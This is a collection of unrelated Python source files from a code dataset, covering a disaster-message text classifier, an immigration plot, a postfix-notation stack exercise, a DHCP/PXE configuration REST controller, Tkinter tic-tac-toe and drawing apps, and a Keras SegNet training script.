'its', 'itself', 'they', 'them',\n 'their', 'theirs', 'themselves', 'what', 'which', 'who', 'whom', 'this',\n 'that', \"that'll\", 'these', 'those', 'am', 'is', 'are', 'was', 'were',\n 'a', 'an', 'the', 'and', 'but', 'if', 'or', 'because',\n 'as', 'until', 'while', 'of', 'at', 'by', 'for', 'with', 'about',\n 'against', 'between', 'into', 'through', 'during', 'before', 'after',\n 'above', 'below', 'to', 'from', 'up', 'down', 'in', 'out', 'on', 'off',\n 'over', 'under', 'again', 'further', 'then', 'once', 'here', 'there',\n 'when', 'where', 'why', 'how', 'all', 'any', 'both', 'each', 'few',\n 'more', 'most', 'other', 'some', 'such', 'no', 'nor', 'not', 'only',\n 'own', 'same', 'so', 'than', 'too', 'very', 's', 't', 
'can', 'will',\n 'just','now', 'd', 'll', 'm',\n 'o', ]\n\n#customized stopwords from nltk, questwords and \"in\" , \"between\", etc. left out\nstopwords_c= ['i', 'me', 'my', 'myself', 'we', 'our', 'ours', 'ourselves', 'you',\n \"you're\", \"you've\", \"you'll\", \"you'd\", 'your', 'yours', 'yourself',\n 'yourselves', 'he', 'him', 'his', 'himself', 'she', \"she's\", 'her',\n 'hers', 'herself', 'it', \"it's\", 'its', 'itself', 'they', 'them',\n 'their', 'theirs', 'themselves', 'what', 'which', 'who', 'whom', 'this',\n 'that', \"that'll\", 'these', 'those', 'am', 'is', 'are', 'was', 'were',\n 'be', 'been', 'being', 'have', 'has', 'had', 'having', 'do', 'does',\n 'did', 'doing', 'a', 'an', 'the', 'and', 'but', 'if', 'or', 'because',\n 'as', 'until', 'while', 'of', 'at', 'by', 'for', 'then', 'once', 'there',\n 'all', 'any', 'both', 'each', 'few',\n 'more', 'most', 'other', 'some', 'such', 'no', 'nor', 'not', 'only',\n 'own', 'same', 'so', 'than', 'too', 'very', 's', 't', 'can', 'will',\n 'just', 'don', \"don't\", 'should', \"should've\", 'now', 'd', 'll', 'm',\n 'o', 're', 've', 'y', 'ain', 'aren', \"aren't\", 'couldn', \"couldn't\",\n 'didn', \"didn't\", 'doesn', \"doesn't\", 'hadn', \"hadn't\", 'hasn', \"hasn't\",\n 'haven', \"haven't\", 'isn', \"isn't\", 'ma', 'mightn', \"mightn't\", 'mustn',\n \"mustn't\", 'needn', \"needn't\", 'shan', \"shan't\", 'shouldn', \"shouldn't\",\n 'wasn', \"wasn't\", 'weren', \"weren't\", 'won', \"won't\", 'wouldn', \"wouldn't\"]\n\n\n#customized stopwords only pronouns & articles, sentence combiner\nstopwords_d= ['i', 'me', 'my', 'myself', 'we', 'our', 'ours', 'ourselves', 'you',\n \"you're\", \"you've\", \"you'll\", \"you'd\", 'your', 'yours', 'yourself',\n 'yourselves', 'he', 'him', 'his', 'himself', 'she', \"she's\", 'her',\n 'hers', 'herself', 'it', \"it's\", 'its', 'itself', 'they', 'them',\n 'their', 'theirs', 'themselves',\n 'this', 'that', \"that'll\", 'these', 'those','a', 'an', 'the', 'and',\n 'but', 'if', 'or', 'because', 'as', 'until', 'while', 'of', 'at',\n 'by', 'for', 'with', 'about', 'against']\n\n\ndef load_data(database_filepath):\n '''\n loads data from sql-database\n database_filepath: path to sqlite database\n returns X (message text), Y(multiple binarized categories), list of category names\n '''\n engine = create_engine('sqlite:///data/DisasterResponse.db')\n df = pd.read_sql('SELECT * FROM messages', con = engine)\n X = df['message']\n Y = df.drop(['genre', 'id', 'original', 'message'], axis=1)\n category_names = Y.columns.tolist()\n return X, Y, category_names\n\ndef tokenize(text):\n '''\n simple tokenization: keep only chars and numbers, convert to lowercase, tokenize and lemmatize using nltk\n text: str that will be tokenized\n\n returns new_tokens (list of extracted tokens)\n '''\n\n #remove punctuation\n text = re.sub(r\"[^a-zA-Z0-9]\", \" \", text.lower())\n #get tokens\n tokens = word_tokenize(text)\n lemmatizer = WordNetLemmatizer()\n new_tokens = []\n for tok in tokens:\n new_tokens.append(lemmatizer.lemmatize(tok).strip())\n return new_tokens\n\nclass StartingVerbExtractor(BaseEstimator, TransformerMixin):\n '''\n extract information whether text starts with verb or verbal phrase\n can be used as estimator in sklearn (transform)\n returns:\n 0 or 1\n '''\n def starting_verb(self, text):\n sentence_list = nltk.sent_tokenize(text)\n for sentence in sentence_list:\n pos_tags = nltk.pos_tag(tokenize(sentence))\n try:\n first_word, first_tag = pos_tags[0]\n if first_tag in ['VB', 'VBP'] or first_word == 'RT':\n return 1\n except:\n 
return 0\n return 0\n\n def fit(self, x, y=None):\n return self\n\n def transform(self, X):\n X_tagged = pd.Series(X).apply(self.starting_verb)\n return pd.DataFrame(X_tagged)\n\n\ndef build_model():\n '''\n define pipeline and/or gridsearch object for feature extraction and trainig classifier\n returns pipeline or gridsearch object\n '''\n pipeline = Pipeline([\n ('features', FeatureUnion([\n ('tfidf_pipeline', Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer())\n ])),\n ('starting_verb', StartingVerbExtractor()),\n ])),\n ('clf', MultiOutputClassifier(SGDClassifier()))\n ])\n\n#parameters = {'features__tfidf_pipeline__vect__max_df': (0.6, 0.8, 1),\n# 'features__tfidf_pipeline__vect__ngram_range': ((1,1),(1, 2)),\n# 'features__tfidf_pipeline__vect__stop_words': (stopwords_a,stopwords_b),\n# 'features__tfidf_pipeline__vect__max_features': (None, 10000),\n# 'clf__estimator__max_iter': (50,),\n# 'clf__estimator__alpha': (0.00001,),\n# 'clf__estimator__penalty': ('elasticnet','l2')}\n\n parameters = {'features__tfidf_pipeline__vect__max_df': (0.6,),\n 'features__tfidf_pipeline__vect__ngram_range': ((1, 2),),\n 'features__tfidf_pipeline__vect__stop_words': (stopwords_a,),\n 'features__tfidf_pipeline__vect__max_features': (None,),\n 'clf__estimator__max_iter': (50,),\n 'clf__estimator__alpha': (0.00001,),\n 'clf__estimator__penalty': ('elasticnet',)}\n cv = GridSearchCV(pipeline, param_grid = parameters, cv=5, n_jobs=1,\n verbose = 2, scoring = make_scorer(roc_auc_score))\n\n return cv\n #return pipeline\n\ndef evaluate_model(model, X_test, Y_test, category_names):\n '''\n evaluate the model\n prints evaluation metrics\n '''\n def get_metrics (y_test, y_pred):\n '''\n runs a number of metrics on multioutput classifier results\n y_test: dataframe with true labels (binary)\n y_pred: numpy array with predicted labels (y_pred = XXXX.predict(X_test) from an sklearn estimator)\n\n returns: dataframe with accuracy, precision, f1, recall, tp, tn, fp, fn, roc_auc\n\n\n\n scores for each multioutput classifier\n '''\n accuracy, precision, recall, f1, support, tn, fp, fn, tp, roc_auc = [], [], [], [], [], [], [], [], [], []\n for i in range (len(y_pred[0,:])):\n try:\n accuracy.append(accuracy_score(y_test.iloc[:,i],y_pred[:,i]))\n except:\n accuracy.append(np.nan)\n try:\n precision.append(precision_score(y_test.iloc[:,i],y_pred[:,i]))\n except:\n precision.append(np.nan)\n f1.append(f1_score(y_test.iloc[:,i],y_pred[:,i]))\n recall.append(recall_score(y_test.iloc[:,i],y_pred[:,i]))\n confusion_mat = confusion_matrix(y_test.iloc[:,i],y_pred[:,i])\n #see https://scikit-learn.org/stable/modules/generated/sklearn.metrics.confusion_matrix.html\n tn_, fp_, fn_, tp_ = confusion_mat.ravel()\n tn.append(tn_)\n fp.append(fp_)\n fn.append(fn_)\n tp.append(tp_)\n roc_auc.append(roc_auc_score(y_test.iloc[:,i],y_pred[:,i]))\n metrics = pd.DataFrame({'cat':category_names,'accuracy':accuracy, 'precision':precision,\n 'f1':f1, 'recall':recall,'true_pos': tp, 'true_neg': tn, 'false_pos':fp,\n 'false_neg':fn, 'roc_auc':roc_auc})\n metrics.set_index(keys='cat', inplace=True)\n return metrics\n #print(f\"Accuracy: {accuracy}\")\n #print(f\"Precision: {precision}\")\n #print(f\"Recall: {recall}\")\n #print(f\"fscore: {fscore}\")\n #print(f\"support: {support}\")\n\n Y_pred_test=model.predict(X_test)\n test_metrics=get_metrics(Y_test,Y_pred_test)\n #we take the mean of all metrics, because we want all predictors to be good,\n #irrespective of their relative occurance. 
This is equivalent to macro-averaging of scores\n # for the binary multilabel case\n print(\"metrics for test set:\")\n print(test_metrics.mean())\n print(\"metrics for test set, each category\")\n print(test_metrics)\n return test_metrics\n\ndef save_model(model, metrics, model_filepath, metrics_filepath):\n '''\n save model and metrics to pkl file\n '''\n joblib.dump(model, model_filepath)\n joblib.dump(metrics, metrics_filepath)\n\ndef main():\n if len(sys.argv) == 3:\n database_filepath, model_path = sys.argv[1:]\n print('Loading data...\\n DATABASE: {}'.format(database_filepath))\n X, Y, category_names = load_data(database_filepath)\n X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2)\n\n print('Building model...')\n model = build_model()\n\n print('Training model...')\n model.fit(X_train, Y_train)\n\n print('Evaluating model...')\n metrics = evaluate_model(model, X_test, Y_test, category_names)\n\n metrics_filepath = os.path.join(model_path,'classifier_metrics.pkl')\n model_filepath = os.path.join(model_path,'classifier.pkl')\n\n print('Saving model...\\n MODEL: {}'.format(model_filepath))\n save_model(model, metrics, model_filepath, metrics_filepath)\n\n print('Trained model saved!')\n\n else:\n print('Please provide the filepath of the disaster messages database '\\\n 'as the first argument and the filepath of the pickle file to '\\\n 'save the model to as the second argument. \\n\\nExample: python '\\\n 'train_classifier.py ../data/DisasterResponse.db classifier.pkl')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"models/train_classifier.py","file_name":"train_classifier.py","file_ext":"py","file_size_in_byte":14013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"149682034","text":"import numpy as np\nimport pandas as pd\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\n\ndf_can = pd.read_excel('https://ibm.box.com/shared/static/lw190pt9zpy5bd1ptyg2aw15awomz9pu.xlsx',\n sheet_name='Canada by Citizenship',\n skiprows=range(20),\n skipfooter=2)\n\ndf_can.isnull().sum()\n\n#Cleaning the data set to remove a few unnecessary columns\ndf_can.drop(['Type','Coverage','AREA','REG','DEV','Type','Coverage'], axis=1, inplace=True)\n\n#Renaming the columns\ndf_can.rename(columns={'OdName':'Country', 'AreaName':'Continent', 'RegName':'Region'}, inplace=True)\n\ndf_can['Total'] = df_can.sum(axis=1) #Summing up the total immigrants by country\n\n#Making a list of years\ndf_can.columns = list(map(str, df_can.columns)) # converting the column names into strings\nyears = list(map(str, range(1980, 2014))) # declaring a new variable\n\ndf_can.set_index('Country', inplace=True) # setting the \"Country\" as the index.\n\n#Top 5 countries\ndf_can.sort_values(by='Total', ascending=False, axis=0, inplace=True)\ndf_can.to_csv('ModifiedData.csv') #Save dataframe\ndf_top5 = df_can.head(5)\ndf_top5 = df_top5[years].transpose() \ndf_top5.index = df_top5.index.map(int) # let's change the index values of df_top5 to type integer for plotting\ndf_top5.plot(kind='line', figsize=(14, 8)) # pass a tuple (x, y) size\n\nplt.title('Immigration Trend of Top 5 Countries')\nplt.ylabel('Number of Immigrants')\nplt.xlabel('Years')\nplt.show()\n\n","sub_path":"Immigration.py","file_name":"Immigration.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"571969362","text":"'''\r\nName: Darius Sandford Date Assigned: 
03-26-2018\r\n\r\nCourse: 1384 Sec 01 Date Due: 04-02-2018\r\n\r\nFile Name: postfixNotation.py\r\n\r\nDescription: Create a Stack class as a fixed length stack that can hold a maximum of 10 values and a program that tests the Stack class.\r\n'''\r\nclass Stack:\r\n\r\n #Creates the constructor\r\n def __init__(self, data = 0, length = 0):\r\n self.__data = [None] * 10\r\n self.__length = 0\r\n #Destroys data\r\n def destroy(self):\r\n self.__data = [None] * 10\r\n self.__length = 0\r\n return\r\n\r\n #Creates is_stack_empty\r\n def is_stack_empty(self):\r\n return self.__length == 0\r\n\r\n #Creates is_stack_full\r\n def is_stack_full(self):\r\n if self.__length == 10:\r\n return True\r\n else:\r\n return False\r\n\r\n #Creates push\r\n def push(self, item):\r\n if not self.is_stack_full():\r\n self.__data[self.__length] = item\r\n self.__length += 1\r\n else:\r\n raise ValueError(\"Stack is full!\") \r\n\r\n def pop(self):\r\n if not self.is_stack_empty():\r\n self.__length -= 1\r\n return_value = self.__data[self.__length]\r\n self.__data[self.__length] = None\r\n return return_value\r\n else:\r\n raise ValueError(\"Stack is empty!\")\r\n \r\n def top(self):\r\n for index in range(self.__length):\r\n if self.__data[index] == None:\r\n return self.__data[index - 1]\r\n return self.__data[self.__length - 1]\r\n\r\n def __len__(self):\r\n return len(self.__data)\r\n\r\n def __str__(self):\r\n return str(self.__data)\r\n \r\ndef main():\r\n expression_file = input(\"Enter the name of the file containing postfix expressions: \")\r\n\r\n found = False\r\n\r\n while not found:\r\n try:\r\n exp_list = open(expression_file)\r\n except FileNotFoundError as ex:\r\n print(expression_file, \"is not found.\")\r\n expression_file = input(\"Please enter another file name: \")\r\n else:\r\n found = True\r\n \r\n for expressions in range(10):\r\n expressions = exp_list.readline()\r\n print(expressions)\r\n \r\n calculator = Stack()\r\n\r\n for each in exp_list:\r\n try:\r\n value = int(each)\r\n except Exception as ex:\r\n second = calculator.pop()\r\n first = calculator.pop()\r\n\r\n if each == \"+\":\r\n answer = first + second\r\n calculator.push(answer)\r\n if each == '-':\r\n answer = first - second\r\n calculator.push(answer)\r\n elif each == \"*\":\r\n answer = first * second\r\n calculator.push(answer)\r\n elif each == \"/\":\r\n answer = first / second\r\n calculator.push(answer)\r\n else:\r\n calculator.push(value)\r\n print(\"Expression: \")\r\n print(\"Answer: \", calculator.pop())\r\n\r\n return\r\n\r\nmain()\r\n \r\n \r\n \r\n \r\n\r\n \r\n","sub_path":"PythonPrograms/PostfixNotation/postfixNotation.py","file_name":"postfixNotation.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"494329563","text":"from fabric.api import execute\nimport pecan\nfrom pecan import rest\nimport wsme\nfrom wsme import types as wtypes\nimport threading\nimport time\n\nfrom oslo_log import log\n\nfrom tuscloudos.api import expose\nfrom tuscloudos.api.controllers import base\nfrom tuscloudos.api.controllers import collection\nfrom tuscloudos import env_config as env_conf\nfrom tuscloudos import config as conf\nfrom tuscloudos import objects\nfrom tuscloudos import fab\nfrom tuscloudos.api.controllers.v1 import node\nfrom tuscloudos.api.controllers.v1 import types\nfrom tuscloudos.common import exception\nfrom tuscloudos.nova import api\nfrom tuscloudos import utils\nfrom tuscloudos import pacemaker as pcs\n\nCONF = 
conf.CONF\nLOG = log.getLogger(__name__)\n\nclass Dhcp(base.APIBase):\n\n    host_uuid = wtypes.text\n    hostname = wtypes.text\n    ip = wtypes.text\n    mac = wtypes.text\n\nclass DhcpController(rest.RestController):\n    \"\"\"REST Dhcp for Default section\"\"\"\n\n    def __init__(self):\n        self.nova_api = api.API()\n        super(DhcpController, self).__init__()\n\n    def _sync_config(self, src, dest):\n        hostname = utils.get_hostname()\n        # copy files to other nodes\n        execute(fab.copy,\n                src,\n                dest,\n                hosts=env_conf.controller_nodes,\n                exclude_hosts=[hostname]\n                )\n\n    def _sync_dhcp(self, name=None, create=False):\n        hostname = utils.get_hostname()\n        # copy files to other nodes\n        if len(env_conf.controller_nodes) > 1:\n            execute(fab.update_dhcp,\n                    name=name,\n                    create=create,\n                    hosts=env_conf.controller_nodes,\n                    exclude_hosts=[hostname]\n                    )\n\n\n    def _create_dhcp(self, dhcp):\n        nodes = self.nova_api.list_dhcp_physical_hosts()\n        new_node = {'hostname': dhcp.hostname,\n                    'manage_ip': dhcp.ip,\n                    'manage_mac': dhcp.mac}\n        nodes.append(new_node)\n        with open('/etc/dhcp/dhcpd.conf', 'w+') as fout:\n            fout.write(conf.env.get_template('tuscloudos/dhcpd.conf').render(\n                my_ip=CONF.my_ip,\n                dhcp_subnet=env_conf.get(key='dhcp_subnet'),\n                dhcp_netmask=env_conf.get(key='dhcp_netmask'),\n                dhcp_gateway=env_conf.get(key='dhcp_gateway'),\n                hosts=nodes))\n\n        utils.execute(\"sed -i 's/ next-server.*$/ next-server {};/g' /etc/dhcp/dhcpd.conf\"\n                      .format(CONF.my_ip))\n        # generate config file\n        mac_name = '01-' + dhcp.mac.replace(':', '-')\n        utils.execute(\"mkdir -p /var/www/html/tuscloud/{}\".format(mac_name))\n        with open('/var/www/html/tuscloud/{}/config'.format(mac_name), 'w+') as fout:\n            fout.write(\"virtual_ip={}\\n\".format(CONF.virtual_ip))\n            fout.write(\"host_uuid={}\".format(dhcp.host_uuid))\n\n        with open('/var/www/html/tuscloud/{}/tuscloudos.conf'.format(mac_name), 'w+') as fout:\n            fout.write(conf.env.get_template('tuscloudos/tuscloudos.conf').render(\n                my_ip=dhcp.ip,\n                my_fqdn=dhcp.hostname,\n                virtual_ip=CONF.virtual_ip,\n                controllers=CONF.controllers,\n                rabbit_hosts=conf.get_rabbit_hosts()))\n\n        with open('/var/www/html/tuscloud/{}/{}.cfg'.format(mac_name, mac_name), 'w+') as fout:\n            fout.write(conf.env.get_template('pxe/tuscloud_mac.cfg').render(\n                password=env_conf.get(key='ks_root_pw'),\n                my_ip=CONF.virtual_ip,\n                port=10080,\n                mac=mac_name))\n\n        with open('/tftpboot/pxelinux.cfg/{}'.format(mac_name), 'w+') as fout:\n            fout.write(conf.env.get_template('pxe/default_mac').render(\n                my_ip=CONF.virtual_ip,\n                port=10080,\n                mac=mac_name))\n        utils.execute(\"chmod 777 /tftpboot/pxelinux.cfg/{}\".format(mac_name))\n\n    def _delete_dhcp(self, hostname):\n        nodes = self.nova_api.list_dhcp_physical_hosts()\n        # list.pop() expects an index; filter the list instead of mutating it while iterating\n        nodes = [node for node in nodes if node['hostname'] != hostname]\n        with open('/etc/dhcp/dhcpd.conf', 'w+') as fout:\n            fout.write(conf.env.get_template('tuscloudos/dhcpd.conf').render(\n                my_ip=CONF.my_ip,\n                dhcp_subnet=env_conf.get(key='dhcp_subnet'),\n                dhcp_netmask=env_conf.get(key='dhcp_netmask'),\n                dhcp_gateway=env_conf.get(key='dhcp_gateway'),\n                hosts=nodes))\n\n    def _restart_dhcp(self):\n        utils.execute('pcs resource disable tus-dhcp')\n        time.sleep(2)\n        utils.execute('pcs resource enable tus-dhcp')\n\n    @expose.expose(body=Dhcp, status_code=200)\n    def post(self, dhcp):\n        LOG.info(\"Create dhcp entry, hostname=%s, mac=%s, ip=%s\",\n                 dhcp.hostname,\n                 dhcp.mac,\n                 dhcp.ip)\n        self._create_dhcp(dhcp)\n        mac_name = '01-' + dhcp.mac.replace(':', '-')\n        self._sync_dhcp(mac_name, True)\n        self._restart_dhcp()\n\n    @expose.expose(None, 
wtypes.text)\n def delete(self, hostname):\n LOG.info(\"Delete dhcp entry for hostname=%s\", hostname)\n self._delete_dhcp(hostname)\n self._sync_dhcp(create=False)\n self._restart_dhcp()\n\n @expose.expose(None, wtypes.text, body=wtypes.DictType(str, str))\n def put(self, hostname, patch):\n LOG.info(\"Update dhcp entry, hostname=%s, patch=%s\",\n hostname,\n patch)\n self._delete_dhcp(hostname)\n dhcp = Dhcp()\n dhcp.ip = patch['ip']\n dhcp.mac = patch['mac']\n dhcp.host_uuid = patch['host_uuid']\n dhcp.hostname = hostname\n mac_name = '01-' + dhcp.mac.replace(':', '-')\n self._create_dhcp(dhcp)\n self._sync_dhcp(mac_name, create=True)\n self._restart_dhcp()\n","sub_path":"others/src/cloud/api/controllers/v1/dhcp.py","file_name":"dhcp.py","file_ext":"py","file_size_in_byte":5873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"72312893","text":"from tkinter import *\r\nimport tkinter.messagebox\r\n\r\n\r\ndef checked(i) :\r\n global player\r\n button = list[i]\r\n\r\n if button[\"text\"] != \" \" :\r\n return\r\n button[\"text\"] = player \r\n button[\"bg\"] = \"yellow\"\r\n\r\n \r\n if player == \"X\" :\r\n player = \"O\"\r\n button[\"bg\"] = \"yellow\"\r\n \r\n else :\r\n player = \"X\"\r\n button[\"bg\"] = \"lightgreen\"\r\n check()\r\n \r\n \r\nwindow = Tk()\r\nplayer = \"X\"\r\nlist = []\r\nwincase = [0, 1, 2, 3, 4, 5, 6, 7, 8, 0, 3, 6, 1, 4, 7, 2, 5, 8, 0, 4, 8, 2, 4, 6] \r\n\r\nfor i in range(9) :\r\n b = Button(window, text=\" \", command=lambda k=i: checked(k))\r\n b.grid(row=i//3, column=i%3)\r\n list.append(b)\r\n \r\n\r\n\r\ndef check() :\r\n j=0\r\n while j < 22 :\r\n if list[wincase[j]][\"text\"] == list[wincase[j+1]][\"text\"] == list[wincase[j+2]][\"text\"] == \"X\" :\r\n tkinter.messagebox.showinfo(\"60132301이석준\", \"X is winner\")\r\n quit()\r\n elif list[wincase[j]][\"text\"] == list[wincase[j+1]][\"text\"] == list[wincase[j+2]][\"text\"] == \"O\":\r\n tkinter.messagebox.showinfo(\"60132301이석준\", \"O is winner\")\r\n quit()\r\n j = j+3;\r\n \r\n \r\nwindow.mainloop()\r\n\r\n\r\n","sub_path":"tic-tac-toe.py","file_name":"tic-tac-toe.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"429002650","text":"import tkinter\nfrom tkinter import *\n#import PIL\n#from PIL import Image, ImageTk, ImageDraw\n\nroot = Tk()\n\nwidth = 800\nheight = 500\nc_bg = 'white'\npensize = 5\nfg = 'black'\n\nroot.geometry(\"900x650\")\nroot.title('Draw')\n\n\nc = Canvas(root, width = width, height = height, bg = c_bg)\nc.place(x = 0, y = 0)\n\n\ndef paint(event):\n x1,y1=(event.x-1), (event.y-1)\n x2,y2=(event.x+1), (event.y+1)\n c.create_line(x1, y1, x2, y2, width = pensize, fill = fg,capstyle = ROUND, smooth = True)\n\ndef changepen1():\n\tglobal pensize\n\tpensize = 5\n\ndef changepen2():\n\tglobal pensize\n\tpensize = 10\n\n\ndef changepen3():\n\tglobal pensize\n\tpensize = 30\n\ndef changepen4():\n\tglobal pensize\n\tpensize = 50\n\ndef changepen5():\n\tglobal pensize\n\tpensize = 100\n\n\n\n\n\n\ndef redcolor():\n global fg\n fg = 'red'\n\ndef bluecolor():\n global fg\n fg = 'blue'\n\n\ndef greencolor():\n global fg\n fg = 'green'\n\ndef yellowcolor():\n global fg\n fg = 'yellow'\n\ndef whitecolor():\n global fg\n fg = 'white'\n\ndef pinkcolor():\n global fg\n fg = 'pink'\n\ndef lightbluecolor():\n global fg\n fg = 'lightblue'\n\ndef orangecolor():\n global fg\n fg = 'orange'\n\ndef blackcolor():\n global fg\n fg = 'black'\n\n\n\ndef 
clearc():\n \tc.delete(ALL)\n\n\ndef newboi():\n\tc.delete(ALL)\n\n\n\n\n\n\n\n\nc.bind('', paint)\n\npensizeb = Button(root, text = \" 1 \", font = (\"Times\", 13, \"bold\"),relief = GROOVE,command = changepen1 )\npensizeb.place(x = 600, y = 500)\n\npensize1 = Button(root, text = \" 2 \", font = (\"Times\", 13, \"bold\"),relief = GROOVE,command = changepen2 )\npensize1.place(x = 650, y = 500)\n\n\npensize2 = Button(root, text = \" 3 \", font = (\"Times\", 13, \"bold\"),relief = GROOVE,command = changepen3 )\npensize2.place(x = 700, y = 500)\n\npensize3 = Button(root, text = \" 4 \", font = (\"Times\", 13, \"bold\"),relief = GROOVE,command = changepen4 )\npensize3.place(x = 750, y = 500)\n\n\npensize4 = Button(root, text = \" 5 \", font = (\"Times\", 13, \"bold\"),relief = GROOVE,command = changepen5 )\npensize4.place(x = 800, y = 500)\n\nredb = Button(root, text = \" \", bg = 'red',font = (\"Times\", 13, \"bold\"),relief = GROOVE, command = redcolor)\nredb.place(x = 10, y = 600)\n\nyellowb = Button(root, text = \" \", bg = 'yellow',font = (\"Times\", 13, \"bold\"),relief = GROOVE, command = yellowcolor)\nyellowb.place(x = 40, y = 600)\n\nlblueb = Button(root, text = \" \", bg = 'lightblue',font = (\"Times\", 13, \"bold\"),relief = GROOVE, command = lightbluecolor)\nlblueb.place(x = 70, y = 600)\n\npinkb = Button(root, text = \" \", bg = 'pink',font = (\"Times\", 13, \"bold\"),relief = GROOVE, command = pinkcolor)\npinkb.place(x = 70, y = 560)\n\nblueb = Button(root, text = \" \", bg = 'blue',font = (\"Times\", 13, \"bold\"),relief = GROOVE, command = bluecolor)\nblueb.place(x = 40, y = 560)\n\nwhiteb = Button(root, text = \" \", bg = 'white',font = (\"Times\", 13, \"bold\"),relief = GROOVE, command = whitecolor)\nwhiteb.place(x = 10, y = 560)\n\nblackb = Button(root, text = \" \", bg = 'black',font = (\"Times\", 13, \"bold\"),relief = GROOVE, command = blackcolor)\nblackb.place(x = 10, y = 520)\n\ngreenb = Button(root, text = \" \", bg = 'green',font = (\"Times\", 13, \"bold\"),relief = GROOVE, command = greencolor)\ngreenb.place(x = 40, y = 520)\n\norangeb = Button(root, text = \" \", bg = 'orange',font = (\"Times\", 13, \"bold\"),relief = GROOVE, command = orangecolor)\norangeb.place(x = 70, y = 520)\n\npb = Button(root, text = \" P \", font = (\"Times\", 13, \"bold\"),relief = GROOVE,command = blackcolor )\npb.place(x = 650, y = 550)\n\neb = Button(root, text = \" E \", font = (\"Times\", 13, \"bold\"),relief = GROOVE,command = whitecolor)\neb.place(x = 700, y = 550)\n\ncb = Button(root, text = \" C \", font = (\"Times\", 13, \"bold\"),relief = GROOVE,command = clearc)\ncb.place(x = 750, y = 550)\n\nnewb = Button(root, text = \"New\", font = (\"Times\", 15, \"bold\"), command = newboi)\nnewb.place(x = 350, y = 550)\n\n\n\nroot.mainloop()\n","sub_path":"Draw/Draw.py","file_name":"Draw.py","file_ext":"py","file_size_in_byte":3842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"466090766","text":"# coding=utf-8\n\nimport h5py\n# import win_unicode_console\n# win_unicode_console.enable()\nimport time\n\nimport matplotlib\n\nmatplotlib.use(\"Agg\")\nimport matplotlib.pyplot as plt\nimport argparse\nimport numpy as np\nfrom keras.models import *\nfrom keras.layers import Conv2D, MaxPooling2D, UpSampling2D, BatchNormalization, Reshape, Permute, Activation, Dropout, \\\n Layer\nfrom keras.utils.np_utils import to_categorical\nfrom keras.preprocessing.image import img_to_array\nfrom keras.callbacks import ModelCheckpoint\nfrom 
sklearn.preprocessing import LabelEncoder\nfrom keras import optimizers\nfrom keras import regularizers\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport cv2\nimport random\nimport os\nfrom tqdm import tqdm\nimport tensorflow as tf\nfrom keras.callbacks import TensorBoard\n\nfrom keras.applications.inception_v3 import InceptionV3,preprocess_input\nfrom keras.optimizers import Adagrad\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\nseed = 7\nnp.random.seed(seed)\n\n# data_shape = 360*480\nimg_w = 256\nimg_h = 256\n# 有一个为背景\nn_label = 4 + 1\n\nclasses = [0., 1., 2., 3., 4.]\n\nlog_filepath_tl = '/home/zq/output/segnet_output_tl_ft/logs_tl'\nlog_filepath_ft = '/home/zq/output/segnet_output_tl_ft/logs_ft'\n\nEPOCHS = 30\nEPOCHS_tl = 2\nEPOCHS_ft = 10\nBS = 2\n\nlearning_rate = 0.01\nsgd = optimizers.SGD(lr = learning_rate, decay = learning_rate/EPOCHS, momentum=0.9, nesterov=True)\nadam = optimizers.Adam(lr=0.0001, beta_1=0.9, beta_2=0.999,epsilon=1e-08)\n\n\nlabelencoder = LabelEncoder()\nlabelencoder.fit(classes)\n\n\n# image_sets = ['1.png','2.png','3.png']\n\n\ndef load_img(path, grayscale=False):\n if grayscale:\n img = cv2.imread(path, cv2.IMREAD_GRAYSCALE)\n else:\n img = cv2.imread(path)\n img = np.array(img, dtype=\"float\") / 255.0\n return img\n\n\nfilepath = \"/home/zq/dataset/dataset_RSI_eCognition/train/\"\n\n\ndef get_train_val(val_rate=0.25):\n train_url = []\n train_set = []\n val_set = []\n for pic in os.listdir(filepath + 'src'):\n train_url.append(pic)\n random.shuffle(train_url)\n total_num = len(train_url)\n val_num = int(val_rate * total_num)\n for i in range(len(train_url)):\n if i < val_num:\n val_set.append(train_url[i])\n else:\n train_set.append(train_url[i])\n return train_set, val_set\n\n\n# data for training\ndef generateData(batch_size, data=[]):\n # print 'generateData...'\n while True:\n train_data = []\n train_label = []\n batch = 0\n for i in (range(len(data))):\n url = data[i]\n batch += 1\n img = load_img(filepath + 'src//' + url)\n img = img_to_array(img)\n train_data.append(img)\n label = load_img(filepath + 'label//' + url, grayscale=True)\n label = img_to_array(label).reshape((img_w * img_h,))\n # print label.shape\n train_label.append(label)\n if batch % batch_size == 0:\n # print 'get enough bacth!\\n'\n train_data = np.array(train_data)\n train_label = np.array(train_label).flatten()\n train_label = labelencoder.transform(train_label)\n train_label = to_categorical(train_label, num_classes=n_label)\n train_label = train_label.reshape((batch_size, img_w * img_h, n_label))\n yield (train_data, train_label)\n train_data = []\n train_label = []\n batch = 0\n\n # data for validation\n\n\ndef generateValidData(batch_size, data=[]):\n # print 'generateValidData...'\n while True:\n valid_data = []\n valid_label = []\n batch = 0\n for i in (range(len(data))):\n url = data[i]\n batch += 1\n img = load_img(filepath + 'src//' + url)\n img = img_to_array(img)\n valid_data.append(img)\n label = load_img(filepath + 'label//' + url, grayscale=True)\n label = img_to_array(label).reshape((img_w * img_h,))\n # print label.shape\n valid_label.append(label)\n if batch % batch_size == 0:\n valid_data = np.array(valid_data)\n valid_label = np.array(valid_label).flatten()\n valid_label = labelencoder.transform(valid_label)\n valid_label = to_categorical(valid_label, num_classes=n_label)\n valid_label = valid_label.reshape((batch_size, img_w * img_h, n_label))\n yield (valid_data, valid_label)\n valid_data = []\n valid_label 